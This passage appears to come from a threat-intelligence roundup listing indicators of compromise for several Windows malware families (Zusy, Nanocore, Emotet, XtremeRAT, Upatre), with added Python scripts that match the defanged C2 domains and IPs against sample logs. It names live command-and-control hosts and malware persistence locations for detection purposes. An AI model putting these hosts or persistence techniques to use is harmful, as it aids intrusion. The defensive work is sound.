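    {"type": "file", "value": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for kind, value in hunt(parse_roundup_iocs(SAMPLE_IOC_TEXT), SAMPLE_EVENTS):
        print(f"HIT {kind}: {value}")
```

Note that the lookup to www.ietf.org fires as well: the roundup lists every domain the sample contacted, and the heading says so explicitly ("Does not indicate maliciousness"). Treat network indicators from these lists as pivots to investigate alongside the registry and file evidence, not as verdicts on their own.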

                File Hashes

                11319f1628f825ee4d742eba134c1ef13f8c1a8347ecc58c9307631b1cf976f9 294b4d3a2a266b214d08237057231398e90db1c615470ed79e965ac2cf2f3f41 3828b71130a42ba1300b528c38d29217adbea7439f125a1ad8ccdaba210fa8f1 410391bb11c0ba164309a084cdcde503a9d88eac9cff7db37c1bb093e8e28f35 46b011edbfc2c0bc67f2e0220c475d78d26d792b16b66dbebef5b21c4a8b0f9e 7712f643f1f23f42e2bb3aa8de85f79641b4e8217b6411729f1edfa59057821a 8cb87415a2b184915ce8fd746e9322e4ffceb01c3f92ea0399c94c65394418fd 9046f36247c7cae4170c0e96c5e7e977ee8a3080ca8bcad90082be29684e4469 9a77b01056bd9fad89171f8917305ad10fa10bd38dac4646de194bd24b8e6894 a017725c2c204c738d0f50f60954d5450102e4414508493a704303ae8f6e7513 bb2cede8c20d3b8a4b404d153dcfcd3076d24e11a5c6d83e6a28b1de92db8c1f c34de7caf7fcda02d8c6de4cdbc7e92f16111e7de26b353f4025f4f16b21fa30 c611a64861e798aabf93ae732a457ff451c9deeabb6d63ee7dfd543ad084e6af c6ed641a2900c11e90c547a79c2e3a01dcb5d8dab1f8b59ee086c06f0375c566 d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69 d8916bb5c067fb78f96cad273e79e71c642040f81c9430c6c5ed852f0fe028ba da953a7b6829d0bf48220aed2f4c4b7498bba47d451f6b9065f6b302ef595da7 deb5817310aafedceddcab3d9ec44728aa46d68f840f177369cd717824936f58 ed12000dfd566a0b18e5fe8789bdcb2a2d121556445ac1cd4506f0aa4de6bb2a f4f92fe38729a0c7b2378e2c8c0970ce7ebd18590b59b57c2134e4021fec1a1b

                Coverage

                Product    Protection
                AMP    This has coverage
                Cloudlock    N/A
                CWS    This has coverage
                Email Security    This has coverage
                Network Security    N/A
                Stealthwatch    N/A
                Stealthwatch Cloud    N/A
                Threat Grid    This has coverage
                Umbrella    N/A
                WSA    N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Malware.Zusy-7171614-1

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: DA81EF4C
                8
                Mutexes    Occurrences
                DA81EF4C    11
                \BaseNamedObjects\7E1FD194    7
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                216[.]218[.]185[.]162    7
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                insamertojertoq[.]cc    11
                yxjsibeugmmj[.]com    7
                Files and or directories created    Occurrences
                %HOMEPATH%\AppData\LocalLow\DA81EF4C    8
                %APPDATA%\DA81EF4C    8
                %APPDATA%\DA81EF4C\bin.exe    8
                %APPDATA%\7E1FD194\bin.exe    7

                File Hashes

                08663c9807b4d858fece615d7e7f132379a7c5652cacbf6584e9adbfd3b6654e 200867228d35c8f4cef7a014221e41c3232fde37f9119c8fa8d30d1121542002 32d41afc1fa28125eb77360dc293184ab6c56ad4259740fef05649f1fcefa82a 3fb0877ce9376e5756ccc847681ccd20a72673655c24814e879556d5ea3e7283 40f210bce6a972939fa3b6874d73d6fb96c654d51cc98464ef87df6002f69f21 a0c05cd49cfd545f35985f45d386a7efcc745a3f87a759b3a94e0dcf864fa60e a2312f676b9b508693f3605549b8ff33286ad61511f4a0a589ef5abeb125b24d aa658c20abd212e39434eb31193c32f09ad39454fa88e242976b619f0681d825 ba39439230cdae8c0f0777cb5a8c0d78a825e4a2820f5da439b2f1ce0d4f3522 bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8 d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a

                Coverage

                Product    Protection
                AMP    This has coverage
                Cloudlock    N/A
                CWS    This has coverage
                Email Security    This has coverage
                Network Security    N/A
                Stealthwatch    N/A
                Stealthwatch Cloud    N/A
                Threat Grid    This has coverage
                Umbrella    This has coverage
                WSA    This has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Malware.Nanocore-7171596-1

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: AGP Manager
                25
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                Value Name: Form1staf
                25
                Mutexes    Occurrences
                Global\{d7ce90e9-f292-46be-8e05-be37399391d6}    25
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                185[.]244[.]31[.]232    25
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                kennethecheazu[.]ddns[.]net    25
                Files and or directories created    Occurrences
                %SystemRoot%\win.ini    25
                %ProgramFiles(x86)%\AGP Manager    25
                %ProgramFiles(x86)%\AGP Manager\agpmgr.exe    25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5    25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs    25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator    25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat    25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\AGP Manager\agpmgr.exe    25
                %TEMP%\Form1TIPPE.exe    25
                %TEMP%\Form1TIPPE.vbs    25
                %APPDATA%\8F793A96-DA80-4751-83F9-B23D8B735FB1\run.dat    18
                %ProgramFiles%\SCSI Host\scsihost.exe    18

                File Hashes

                186e0067550d5d1833c08c7dfd7d91e71d4d5e7d426ef3c7d1edce0554c6424c 202203455899333d624e633917a16b94ddf96eb6a03f284074aab4c1ed0c2218 3bb79bf9626bcf40d81afc303045cb4eb4267ffedee15840179aec2c50eeb82c 4c41af943d2a84a6644933e35e96342dd6195b7b9a33f6fb68c6b92949018e0a 5a1713269673c62544ea6f2a2b266d5df4ed331f1570b0dfc4aa33b3e79c5ce5 601e562e6ea29842ad3ddb246ad5f45250641d2502178c476bbefa19b3acb4e1 6d9d22a3cd4855e3673acbee8619ed213b0e330e6a4560976dda878b5101daec 73470e418c1a73792c06354c7b6d43b615d7ab246e0cff0d5dffbb2725bbfb64 76399c26a09d5953f2349c2c529fc74344160fbc639089dcab56c8409fe2bab5 8f3b8987dd405be851f06d6589ac9f9b9669ff60f5ca29e5eaa698fdd59259ef 8f54b0cb0c575486dd8ea255400b96c0d9c5f48cdf4023f6ffea59004847b627 973e1c1d3d264e764f374dc679852f27913f5afce497fa4d605118ab4e8e41d2 99f095cbbb7919e8fff151eb5175de2680b26dc94f91806343a2b48fce853f8a b46d3a615cc5d6f7ebd553c36edb963aacca5f98a271a1b91411b0b2254d4c64 c33f9cdc0fb36fd7147c15adcd46ab375138f87defedee87600270530380fbbb c4b21c6b8d558fab52a7035e290050132a3011bca864357bfdca398e61ae0ee8 ca9bec90dc6c5084d486e1b19870a9faf0d8f2571802abd08d8156a99eb1d249 cfc11408c01c5fd5eea0f19fca3a6e761d12f2173b6b3c1fd992bb7127e407a8 d1bb9db8ba25c30346a47d50956f71de7015488d8a86630bd18740df485d46fd e3baec6c7f8bc621d76b4d928e7fe3738b9703d7886a1e5ed7968700c3907ce6 ea5c81219c7ff4e8a9fce2aaf6e553a1aa5fdfb59a19d427acd66d08e82306e2 edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1 f6e98bf8216f833b1dd152150e7155c0c639d6a0323d8f7d738bd27673f5ce1b fa32101dcf6a77b32d23cc08ccdff496442b983e4233bed1f4e7d6ad0a4d8f8c fc13c2128949b11b45166489ff26970989d4dc12a456f22cbad00847c069a4a0
                *See JSON for more IOCs

                Coverage

                Product    Protection
                AMP    This has coverage
                Cloudlock    N/A
                CWS    This has coverage
                Email Security    This has coverage
                Network Security    N/A
                Stealthwatch    N/A
                Stealthwatch Cloud    N/A
                Threat Grid    This has coverage
                Umbrella    N/A
                WSA    N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Malware.Emotet-7171351-0

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: ProxyEnable
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: ProxyServer
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: ProxyOverride
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: AutoConfigURL
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: AutoDetect
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadDecisionReason
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadDecision
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadNetworkName
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadDetectedUrl
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                Value Name: CachePrefix
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                Value Name: CachePrefix
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                Value Name: CachePrefix
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: ErrorControl
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: ImagePath
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: DisplayName
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: WOW64
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: ObjectName
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED 18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
                Value Name: WpadDecisionReason
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
                Value Name: WpadDecision
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
                Value Name: WpadDetectedUrl
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C
                Value Name: WpadDecisionReason
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C
                Value Name: WpadDecision
                1
                Mutexes    Occurrences
                Global\I98B68E3C    18
                Global\M98B68E3C    18
                PEM19C    18
                \BaseNamedObjects\PEM570    18
                PEM748    17
                \BaseNamedObjects\Global\M3C28B0E4    14
                \BaseNamedObjects\PEM298    14
                \BaseNamedObjects\Global\I3C28B0E4    14
                PEM4A0    10
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                104[.]236[.]185[.]25    18
                82[.]78[.]228[.]57    18
                187[.]207[.]188[.]248    18
                211[.]229[.]116[.]97    18
                190[.]146[.]86[.]180    4
                190[.]117[.]206[.]153    4
                186[.]3[.]188[.]74    1
                190[.]146[.]214[.]85    1
                190[.]15[.]198[.]47    1
                187[.]188[.]166[.]192    1
                88[.]215[.]2[.]29    1
                Files and or directories created    Occurrences
                %System32%\Microsoft\Protect\S-1-5-18\User\Preferred    18
                %ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5    18
                %SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe    18
                %System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e88-f6c8d68fdc7a    1
                %System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-8613-c59bb06aee08    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa11-7d33abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-4233abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a1c-4d33abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-b610-299ab06aee08    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a12-7333abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-7333abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-4d33abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-f332abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e87-cac8d68fdc7a    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a1c-f332abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-961f-f89bb06aee08    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa1f-7833abe498b7    1
                %System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e89-c6c8d68fdc7a    1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-ba10-4133abe498b7    1

                File Hashes

                5c5acd7e82fb19bfa8a9759c1fc51e93acffb579661fc9b4455fa2f87fd05089 77cbf599e26ac6f094a75c9f3c5d15e4b53bcf9415ddecaa6d91854f16c3b19d b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088 c24216d6f195da529874a5db11c969abeadf873379c79a92759ad7378811b2e5 c379f58194bd325c7a5c95dd0d764f10781f4380586853bfe11a5ceb1d3e5aeb cc848b89bb84b0c6ae96d7191c415dcacf542aed4b2a610a0cf6b77047d7b3ef d626aacbbd26f0c7d5baee7fd6e49ee8ae2aed7c6352d39ac25134e9985400c6 d8199db09a16c0f851cb3dde4fc06183d23650295836d1a24c4d868af5acc7e3 d86584f92b6af0bfde4a4720878d5ad64f6d8c295b61f5cc345b2fcfa952758e de3841cd0ab0001fdfd28a4f3fd15d5d20c09629f7857642083e95fa9b716364 e4edfd2654acbab633fbd862641abd852cf3568614b7596373c6c4951e063998 ee21917b1596852818813250aa9a5ee37e87f7ca43120e17f09f940d058c1557 f2dcd182c3a281ee4b0026f6267fb1fafd27ae3f656941464363e4d1c0d68a28 f60672c54ec0ba38a7c7200f75859b811e1c589f84c693a82125350f89d15c94 f75984cfa2bb3c33629e71565da34a8af4b087acf91a19b1dca7481d7adff22b fcb2b44ce9f1646c1f33a82ed4afa47874166ca0c3842773d1e64fbe603de847 fce9a64d721296eaacbc034526c0719e5628575b25456436664d69cfc4155485 fe7983bcbdb91a3cfa96e68bc57ae13007041e7f048f92372a6488da79c93af7

                Coverage

                Product               Protection
                AMP                   This has coverage
                Cloudlock             N/A
                CWS                   This has coverage
                Email Security        This has coverage
                Network Security      This has coverage
                Stealthwatch          N/A
                Stealthwatch Cloud    N/A
                Threat Grid           This has coverage
                Umbrella              N/A
                WSA                   This has coverage

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Trojan.XtremeRAT-7170522-1

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: HKLM
                15
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: HKCU
                15
                <HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
                Value Name: InstalledServer
                14
                <HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 14
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} 6
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13}
                Value Name: StubPath
                6
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48}
                Value Name: StubPath
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48} 5
                <HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
                Value Name: ServerStarted
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B}
                Value Name: StubPath
                1
                <HKCU>\SOFTWARE\ASDAF2DS3F 1
                <HKCU>\SOFTWARE\ASDAF2DS3F
                Value Name: ServerStarted
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}
                Value Name: StubPath
                1
                <HKCU>\SOFTWARE\ASDAF2DS3F
                Value Name: InstalledServer
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} 1
                Mutexes    Occurrences
                XTREMEUPDATE    15
                2H8xgwYEXIT    9
                1nGM3R2HW    6
                1nGM3R2HWPERSIST    6
                \BaseNamedObjects\SHuJ5a0JNEXIT    5
                \BaseNamedObjects\SHuJ5a0JNPERSIST    5
                \BaseNamedObjects\SHuJ5a0JN    5
                2H8xgwYPERSIST    3
                2H8xgwY    3
                asdaf2ds3f    1
                asdaf2ds3fPERSIST    1
                asdaf2ds3fEXIT    1
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                192[.]169[.]69[.]2511
                186[.]80[.]214[.]751
                181[.]136[.]96[.]201
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                lili3030[.]duckdns[.]org    6
                thork13[.]duckdns[.]org    4
                explocion[.]ddns[.]net    1
                toyota[.]duckdns[.]org    1
                master254781[.]ddns[.]net    1
                TAVO11[.]DDNS[.]NET    1
                Files and or directories created    Occurrences
                %TEMP%\iJune22.exe    15
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\iJune22.lnk    15
                \~WELK\TLO.dll    10
                \~WELK    10
                %HOMEPATH%\Start Menu\Programs\Startup\iJune22.lnk    8
                %APPDATA%\Microsoft\Windows\1nGM3R2HW.dat    6
                %APPDATA%\Microsoft\Windows\1nGM3R2HW.cfg    6
                %SystemRoot%\Hewlett    6
                %SystemRoot%\Hewlett\world.exe    6
                %APPDATA%\Microsoft\Windows\SHuJ5a0JN.cfg    5
                %APPDATA%\Microsoft\Windows\SHuJ5a0JN.dat    5
                %SystemRoot%\chrome\google.exe    5
                \~GGFD    5
                \~GGFD\VDF.dll    5
                %SystemRoot%\chrome    5
                %TEMP%\x.html    4
                %SystemRoot%\InstallDir    3
                %APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.dat    3
                %APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg    3
                %SystemRoot%\InstallDir\Server.exe    2
                %APPDATA%\Microsoft\Windows\SHuJ5a0JN.xtr    1
                %SystemRoot%\SysWOW64\System32    1
                %SystemRoot%\SysWOW64\System32\DELL1.exe    1
                %APPDATA%\Microsoft\Windows\asdaf2ds3f.dat    1
                %APPDATA%\Microsoft\Windows\asdaf2ds3f.cfg    1
                *See JSON for more IOCs

                File Hashes

                21580ad6d39d4f863d8022706812586ef748d179974f3de5b3bae954192ac085 3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6 5364296fb8c7f23a30f12abaafdab87659050ae699d8eea17eca90b148959d21 593c32f771db8970231f0543e4b58bc978bbba4e2e6a0285303017040217c250 66a92f7dc4f6ad067ea257be7ceea59e89e5e5b7fccfe1808bb97db7e07741b4 6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c 7408cda78e127d3d8a7ba8b94b3b062a4a2e0e144fd15422c194dba4a2588ec2 7bf298822f352c0324495373ab984eaecb12f72277988c146496ce19e7e787ba 88fbd4fe4e2aa94375a7cd18305ef0f57722a5e83a468122e847711ebef1b4f1 a75930eb9955724aac62046b3fdff1d4b0c9ce834279915e18b44e2d290e7bde a90db1ec3e45cc03acbb2ee990ff8bd3815cb1c1ccb1ebb6ade227d4493a1d10 b3d349857cf2aa51d4781e02c414f8f34de52cd123b692b49303aaf1e9488822 dfb4eb5f09a31230bdfe457b3fd427b591b6700b62d0036a1d2380db9f464a92 ec1a87dde0b88b9a390439a57830e13063292378abc5c7c21c4fcd3e8054df28 f9cac38fde30e5c07840ec2fe6ca351d2e5f4da5fe4c8ddebd5bab3a51b83902 ff3902531d9310ea6c38cab19b575a88bcd44d9083430789f4cba4c79979193d

                Coverage

                Product               Protection
                AMP                   This has coverage
                Cloudlock             N/A
                CWS                   This has coverage
                Email Security        This has coverage
                Network Security      This has coverage
                Stealthwatch          N/A
                Stealthwatch Cloud    N/A
                Threat Grid           This has coverage
                Umbrella              This has coverage
                WSA                   This has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella
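The XtremeRAT tables above give the command-and-control hostnames defanged with `[.]`, in mixed case (TAVO11[.]DDNS[.]NET beside lili3030[.]duckdns[.]org), and every one of them under a free dynamic-DNS service. Turning that list into a log search needs three things the table does not do for you: refanging, case and trailing-dot normalisation, and a rule that a dynamic-DNS indicator matches only its exact hostname, because anyone can register another name under duckdns.org or ddns.net and a suffix match would flag unrelated users. The Python below is an added example, not Talos code: the indicator strings are copied from the XtremeRAT tables, while the log lines, their format and the dynamic-DNS provider list are constructed assumptions for the demonstration.

```python
"""Match the defanged network indicators from a Threat Roundup table against
DNS/proxy log lines.

Added example for this page, not Talos code. The indicator strings are copied
from the Win.Trojan.XtremeRAT-7170522-1 tables above; the log lines, the log
format and the dynamic-DNS provider list are constructed for the demo.
"""
import ipaddress
import re
from dataclasses import dataclass

# Indicators copied from the XtremeRAT tables above.
XTREMERAT_DOMAINS = [
    "lili3030[.]duckdns[.]org", "thork13[.]duckdns[.]org",
    "explocion[.]ddns[.]net", "toyota[.]duckdns[.]org",
    "master254781[.]ddns[.]net", "TAVO11[.]DDNS[.]NET",
]
XTREMERAT_IPS = ["186[.]80[.]214[.]75", "181[.]136[.]96[.]20"]

# Assumption: apex domains of free dynamic-DNS services. Anyone can register a
# hostname under them, so only the exact hostname from the table is an
# indicator; matching the apex or its other subdomains would flag strangers.
DYNAMIC_DNS_APEXES = {"duckdns.org", "ddns.net", "no-ip.info"}

HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass(frozen=True)
class Hit:
    line_no: int
    indicator: str
    observed: str


def refang(indicator: str) -> str:
    """Turn the table's 'a[.]b' notation into a comparable, normalised form."""
    return indicator.replace("[.]", ".").strip().lower().rstrip(".")


def is_dynamic_dns(host: str) -> bool:
    labels = host.split(".")
    return any(".".join(labels[i:]) in DYNAMIC_DNS_APEXES for i in range(len(labels)))


def host_matches(observed: str, indicator: str) -> bool:
    """Exact match for dynamic-DNS names; the name or any subdomain otherwise."""
    if observed == indicator:
        return True
    if is_dynamic_dns(indicator):
        return False
    return observed.endswith("." + indicator)


def scan(log_lines, domains=XTREMERAT_DOMAINS, ips=XTREMERAT_IPS):
    ioc_hosts = [refang(d) for d in domains]
    ioc_ips = {ipaddress.ip_address(refang(i)) for i in ips}
    hits = []
    for n, line in enumerate(log_lines, 1):
        # Hostnames are compared case-insensitively and without a trailing dot,
        # because logs and tables (TAVO11[.]DDNS[.]NET) disagree on both.
        for host in sorted({h.lower().rstrip(".") for h in HOST_RE.findall(line)}):
            for ind in ioc_hosts:
                if host_matches(host, ind):
                    hits.append(Hit(n, ind, host))
        for raw in sorted(set(IP_RE.findall(line))):
            try:
                addr = ipaddress.ip_address(raw)
            except ValueError:  # e.g. 999.1.1.1 passes the loose regex
                continue
            if addr in ioc_ips:
                hits.append(Hit(n, str(addr), raw))
    return hits


# Constructed log lines (not from the page). Line 2 queries the provider's own
# site under a dynamic-DNS apex and must NOT hit.
SAMPLE_LOGS = [
    "2019-09-04T10:01:02Z dns client=10.0.0.5 qname=TAVO11.ddns.net. qtype=A",
    "2019-09-04T10:01:03Z dns client=10.0.0.5 qname=www.duckdns.org qtype=A",
    "2019-09-04T10:02:10Z proxy client=10.0.0.7 dst=186.80.214.75:443 action=allow",
    "2019-09-04T10:02:11Z dns client=10.0.0.9 qname=mail.example.com qtype=MX",
    "2019-09-04T10:03:00Z dns client=10.0.0.5 qname=lili3030.duckdns.org qtype=A",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit.line_no}: {hit.observed} matched {hit.indicator}")
```

Running it reports three hits (lines 1, 3 and 5) and stays quiet on www.duckdns.org; the same `scan()` takes the domain and IP columns of any of the other tables on this page as its `domains` and `ips` arguments.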




                Win.Downloader.Upatre-7170342-1

                Indicators of Compromise

                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                104[.]18[.]62[.]192    19
                104[.]18[.]63[.]192    9
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                mmile[.]com    28
                Files and or directories created    Occurrences
                %TEMP%\hfdfjdk.exe28
                %TEMP%\ckjienn.exe28
                %TEMP%\file.pe326
                %HOMEPATH%\Downloads\invoice.exe4

                File Hashes

